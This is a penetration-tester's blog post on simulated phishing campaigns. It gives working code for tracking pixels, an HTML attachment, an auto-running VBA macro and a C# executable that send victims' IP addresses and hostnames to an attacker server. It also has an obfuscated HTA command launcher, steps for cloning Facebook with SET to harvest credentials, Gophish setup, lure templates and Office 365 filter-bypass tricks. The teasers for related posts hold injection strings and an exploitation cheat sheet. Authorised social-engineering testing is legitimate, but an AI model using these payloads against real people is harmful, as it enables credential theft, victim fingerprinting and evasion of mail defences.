Social Engineering Testing - Phishing



Update on 20190527

Design Domain Name using CATPHISH or DNSTWIST


CATPHISH can be retrieved at https://github.com/ring0lab/catphish
DNSTWIST can be retrieved at https://github.com/elceef/dnstwist

A1. Phishing

1. Build Email Template manually using HTML

2. Include the following HTML code to keep track the action of victim once the victim enable the image to be load while reading the mail

<img src="http://<server_ip>/tracker.php?email=<victim_email>"/>
3. Create tracker.php and log.txt in DocumentRoot (e.g /var/www/html).

4. Include the following PHP codes inside tracker.php.  

<?php
date_default_timezone_set ("Asia/Kuala_Lumpur");
$today = date("d-m-Y H:i:s");

if(isset($_GET["email"])){
$logMessage = '['.$today.'] '.$_GET["email"].' read the mail. ';
}

$filePath = "./log.txt";
$logFile = fopen($filePath,"a+");
fwrite($logFile, $logMessage);
fclose($logFile);
?>

5. Read the log.txt to see who are trying to open up the mail. 






A2. Attachment (HTML)

1. Create promotion.html with the following content:


<html>
<head></head>
<body>
<script>
var xhr = new XMLHttpRequest();
xhr.open('GET', "http://ipinfo.io/json", true);
xhr.send();
xhr.addEventListener("readystatechange", processRequest, false);
var ip = "";

function processRequest(e) {
 if (xhr.readyState == 4 && xhr.status == 200) {
       var response = JSON.parse(xhr.responseText);
       ip = response.ip;
       country = response.country;
    }

    var log = "[" + Date() +  "] " + ip + " from " + country + " accessed to " + "" + " (" + window.location.href + ") with HTML attachment.\r\n";

    new Image().src = 'http://<server_ip>/tracker.php?attachment=' + log;
}

</script>
</body>
</html>

2. Modify tracker.php from A1. Phishing, add in the following code:

if(isset($_GET["attachment"])){
$logMessage = $_GET["attachment"];
}
3. Send victim an email with promotion.html attachment.

4. Read the log.txt to see who are trying to open up the attachment. 






A3. Attachment (VBA)

1. Create and open promotion.docm.

2. Press Alt + F9 to open Macros windows. Create a macro named AutoExec.




3. Apply the following code in the macro.

Sub AutoExec()
Dim MyRequest As Object

    Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
   
    Dim DateTime As String
    Dim IPAddress As String
    Dim Hostname As String
    Dim Log As String
   
    DateTime = Now
    IPAddress = GetIPAddress()
    Hostname = Environ("computername")
    Log = "[" + DateTime + "] Accessed to " + IPAddress + "(" + Hostname + ")" + " with attachment."
   
    ' MsgBox Log
    MyRequest.Open "GET", _
    "http://<server_ip>/tracker.php?attachment=" + Log
   
    ' Send Request.
    MyRequest.Send
   
    ' MsgBox IPAddress + "accessed by " + Hostname
   
End Sub

Function GetIPAddress()
    Const strComputer As String = "."   ' Computer name. Dot means local computer
    Dim objWMIService, IPConfigSet, IPConfig, IPAddress, i
    Dim strIPAddress As String

    ' Connect to the WMI service
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    ' Get all TCP/IP-enabled network adapters
    Set IPConfigSet = objWMIService.ExecQuery _
        ("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE")

    ' Get all IP addresses associated with these adapters
    For Each IPConfig In IPConfigSet
        IPAddress = IPConfig.IPAddress
        If Not IsNull(IPAddress) Then
            strIPAddress = strIPAddress & Join(IPAddress, ", ")
        End If
    Next
    GetIPAddress = strIPAddress
End Function

4. Send the attachment to the victim and read log.txt.






A4. Attachment (Executable File)

1. Create a Console App (.Net Framework) using Microsoft Visual Studio.




2. Edit Program.cs with the following code.


using System;
using System.Net;
using System.Globalization;

namespace TrackMe
{
    class Program
    {
        static void Main(string[] args)
        {
            DateTime localDate = DateTime.Now;
            var culture = new CultureInfo("en-US");
            string datetime = localDate.ToString(culture);

            IPHostEntry host;
            string localIP = "";
            string hostname = Dns.GetHostName();
            host = Dns.GetHostEntry(hostname);

            //To retrieve IP Addresses
            foreach (IPAddress ip in host.AddressList)
            {
                if (ip.AddressFamily.ToString() == "InterNetwork")
                {
                    localIP = ip.ToString();
                }
            }

            String log = $"[{datetime}] Accessed to {localIP} ({hostname}) with attachment.";

            //To send the logs to receiver
            var client = new WebClient();
            var content = client.DownloadString($"http://<server_ip>/tracker.php?attachment={log}");
        }
    }
}

3. Get the executable file (.exe) and send it to victim.

4. Study log.txt.





A5. Attachment (HTA File)


<html>
<head>
<script>
a=new ActiveXObject('Wscript.Shell');
a.Run("calc.exe",0,false);
</script>
</head>
<body>
</body>
</html>

Obfuscated version.
https://www.cleancss.com/javascript-obfuscate/index.php 
<html>
<head>
<script>
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=5 4(\'3.2\');1.6("8.7",0,9);',10,10,'|a|Shell|Wscript|ActiveXObject|new|Run|exe|calc|false'.split('|'),0,{}))
</script>
</head>
<body>
</body>
</html>

B1. Social Engineering Toolkit (SET) 


1. Download SET from https://github.com/trustedsec/social-engineer-toolkit

2. run setoolkit and select the following sequence of options:
1) Social-Engineering Attacks
  2) Website Attack Vectors
     3) Credential Harvester Attack Method
      2) Site Cloner



root@kali:~/Downloads/social-engineer-toolkit-master# python setoolkit
set> 1
set> 2
set:webattack>3
set:webattack>2

3. Enter your server IP address and the website URL which you would like to clone.

set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.231.129]:192.168.231.129
set:webattack> Enter the url to clone:https://www.facebook.com





4. Wait for the victim to click on the hyperlink in the email and enter the credentials. 



5. Study the response at terminal. 



6. Generate the report when phishing campaign is done.



B2. Gophish 


 1. Download Gophish at https://getgophish.com.

2. Run gophish.exe


3. Browse https://127.0.0.1:3333/login and login (default credentials: admin:gophish)




B2.1 Setup Sending Profile




B2.2 Create Mail Template 




B2.3 Import Landing page





B2.4 Import User Group





B2.5 Create Campaign


B2.6 Victim Interaction

The sample email received by the victim as below:

The source code of the email reveals the actual link for password reset hyperlink.





 B2.7 Monitor Campaign



C. Email Template

Email Storage Full

<table border="0" cellpadding="0" cellspacing="0" width="600"><tr><td valign="top" width="300px" bgcolor="#990000"><font color="white">&nbsp;1864 MB</font></td><td valign="top" width="10px" bgcolor="#c2c2a3">&nbsp;</td><td>&nbsp;2048 MB</td></tr></table>



Email Image
Image to Base64: https://www.ofoct.com/html5-app/image-to-css3.html



<img src="data:image/png;base64,..." />

Microsoft Office 365 Bypass

BaseStriker

baseStriker: Office 365 Security Fails To Secure 100 Million Email Users 
<html>
<head>
<base href="http://localhost">
</head>
<body>
This is how <a href="dvwa">baseStriker</a> bypass Microsoft Office 365 Safe Links.
</body>
</html>



Zero Font

ZeroFont Phishing: Manipulating Font Size to Get Past Office 365 Security 
<html>
<head></head>
<body>
<h1>ZeroFont Phishing (Office 365 Bypass)</h1>
<h3><span style="font-size: 0px;">A </span>C<span style="font-size: 0px;">onvincing BEC email </span> o<span style="font-size: 0px;">r </span> p<span style="font-size: 0px;">hish</span>y t<span style="font-size: 0px;">ext </span>hi<span style="font-size: 0px;">de</span>s <span style="font-size: 0px;">with</span>in<span style="font-size: 0px;"> a </span>to<span style="font-size: 0px;">t</span> a <span style="font-size: 0px;">lly different con</span>text <span style="font-size: 0px;">. An advanc</span>ed<span style="font-size: 0px;"> f</span>i<span style="font-size: 0px;">l</span>t<span style="font-size: 0px;">er </span>or <span style="font-size: 0px;">AI sc</span>an<span style="font-size: 0px;">ner shoul</span>d see wh<span style="font-size: 0px;">at </span>y<span style="font-size: 0px;">ou do. If not,</span> your phishing filter would mis<span style="font-size: 0px;">read the way you </span>s<span style="font-size: 0px;">ee</span> it.</h3>
</body>
</html>




Zero-Width Spaces (ZWSPs)

Z-WASP Vulnerability Used to Phish Office 365 and ATP 
<a href="http://www&#8204;.google.&#8204;com">Google</a>



NoRelationship Attack

The NoRelationship Attack Bypasses Office 365 Email Attachment Security

Browser Address Bar Spoofing

Apple Safari & Microsoft Edge Browser Address Bar Spoofing - Writeup


Explore More

Popular posts from this blog

Remote Desktop Protocol (RDP) Security

Image
Common Remote Desktop Protocol (RDP) Vulnerabilities Terminal Services Encryption Level is Medium or Low Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness Terminal Services Doesn't Use Network Level Authentication (NLA) Only Terminal Services Encryption Level is Medium or Low Vulnerability Assessment: Host Assessment: Remediation: Local Computer Policy/Computer Configuration/Administrative Templates/Windows Components/Remote Desktop Services/Remote Desktop Session Host/Security/Set client connection encryption level Set client connection encryption level to High Note: High: The High setting encrypts data sent from the client to the server and from the server to the client by using strong 128-bit encryption. Use this encryption level in environments that contain only 128-bit clients (for example, clients that run Remote Desktop Connection). Clients that do not support this encryption level cannot connect to RD Se
Read more

Penetration Testing - Network

Image
Manual Vulnerability Assessment TCP/21: FTP Anonymous FTP Enabled anonymous guest TCP/22: SSH nmap -p 22 --script ssh2-enum-algos <ip_address> SSH Weak Algorithms Supported SSH Server CBC Mode Ciphers Enabled ssh -oCiphers=<ciphers> <ip_address> SSH Weak MAC Algorithms Enabled ssh -oMACs=<algorithm> <ip_address> SSH Protocol v1 Supported ssh -1 <ip_address> -v Hardening on SSH Ciphers aes256-ctr,aes192-ctr,aes128-ctr MACs hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com TCP/23: Telnet Unencrypted Telnet Server telnet <ip_address> 23 TCP/25: SMTP SMTP Service Cleartext Login Permitted telnet <ip_address> 25 EHLO <ip_address> AUTH LOGIN Mailserver answer to VRFY and EXPN requests * nc <ip_address> 25 EXPN root VRFY root TCP/53: DNS DNS Server Cache Snooping Remote Information Disclosure
Read more

Damn Vulnerable Web Services (DVWS) - Walkthrough

Image
Installation Damn Vulnerable Web Services  (DVWS) is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities. https://github.com/snoopysecurity/dvws WSDL Enumeration Spider DVWS using Burp Suite and look for service.php Requests processed by SOAP service include  check_user_information ,  owasp_apitop10 ,  population  and  return_price XPATH Injection User Login: 1' or '1'='1 User Password: 1' or '1'='1 Command Injection Original Request parameter value of name is " find "   by default  Edited Request change the parameter value of  name  from "find" to " dir "   Cross Site Tracing (XST) Hint of " The NuSOAP Library service is vulnerable to a Cross-site scripting flaw " is given by DVWS. Exploit is published at exploit DB ( https://www.exploit-db.com/e
Read more

Offensive Security Testing Guide

Image
This cheat sheet is the compilation of commands we learnt to exploit the vulnerable machines. The commands below may not be enough for you to obtain your Offensive Security Certified Professional (OSCP). So... Try Harder! Information Gathering Operating System Windows Interesting Path "Documents and Settings"/Administrator/Desktop file:///C:/xampp/readme_en.txt file:///C:/xampp/passwords.txt file:///C:/xampp/webdav/webdav.txt file:///C:/xampp/apache/conf/extra/httpd-dav.conf file:///C:/xampp/apache/conf/extra/httpd-xampp.conf file:///C:/xampp/apache/logs/access.log file:///C:/xampp/apache/logs/error.log file:///C:/xampp/security/webdav.htpasswd file:///C:/xampp/htdocs/dashboard/phpinfo.php file:///C:/xampp/phpmyadmin/config.inc.php file:///C:/xampp/php/logs/php_error_log file:///C:/xampp/mysql/bin/my.ini C:\Users\<User>\AppData\Local\Temp #Email Address C:\Users\<User>\AppData\Local\Microsoft\Outlook Active Connection netstat -anob #R
Read more

Server Message Block (SMB) Security

Image
Common SMB related vulnerabilities Microsoft Windows SMBv1 Multiple Vulnerabilities SMB Signing Disabled Microsoft Windows SMB NULL Session Authentication Microsoft Windows SMB Shares Unprivileged Access Network Discovery: TCP port 5357 - Web Services on Devices API (WSDAPI) File and Printer Sharing: TCP port 135 - Remote Procedure Call (RPC) TCP port 139 - NETBIOS Session Service TCP port 445 - Server Message Block (SMB) By disable NetBIOS over TCP/IP (TCP Port 139), NETBIOS name discovery will be prevented Microsoft Windows SMBv1 Multiple Vulnerabilities Vulnerability Assessment: NSE script smb-protocols can be used to check if the server supported NT LM 0.12 (SMBv1) . Host Assessment: Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters | ForEach-Object {Get-ItemProperty $_.pspath} Remediation: Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters
Read more

Host Configuration Assessment - Windows

Image
OS Information Gathering systeminfo wmic computersystem get domainrole 0 - Standalone workstation 1 - Member workstation 2 - Standalone server 3 - Member server 4 - Domain controller secedit /export /cfg cfg.ini > nul net user administrator > netuseradmin.txt auditpol.exe /get /category:* > auditpol.txt netsh advfirewall show allprofiles > firewall.txt net accounts > netaccount.txt gpresult /f /h evid/gporesult.html > nul accesschk /accepteula -q -a * > accesschk.txt *Simplify the process with Scgary ! User Right Assignment type cfg.ini | grep "^SeAuditPrivilege\|^SeCreatePagefilePrivilege\|^SeRemoteShutdownPrivilege\|^SeRemoteInteractiveLogonRight\|^SeEnableDelegationPrivilege\|^SeLockMemoryPrivilege\|^SeDenyNetworkLogonRight\|^SeChangeNotifyPrivilege\|^SeDebugPrivilege\|^SeDenyBatchLogonRight\|^SeCreateGlobalPrivilege\|^SeShutdownPrivilege\|^SeIncreaseQuotaPrivilege\|^SeTrustedCredManAccessPrivilege\|^SeDenyInteractiveLogonRight
Read more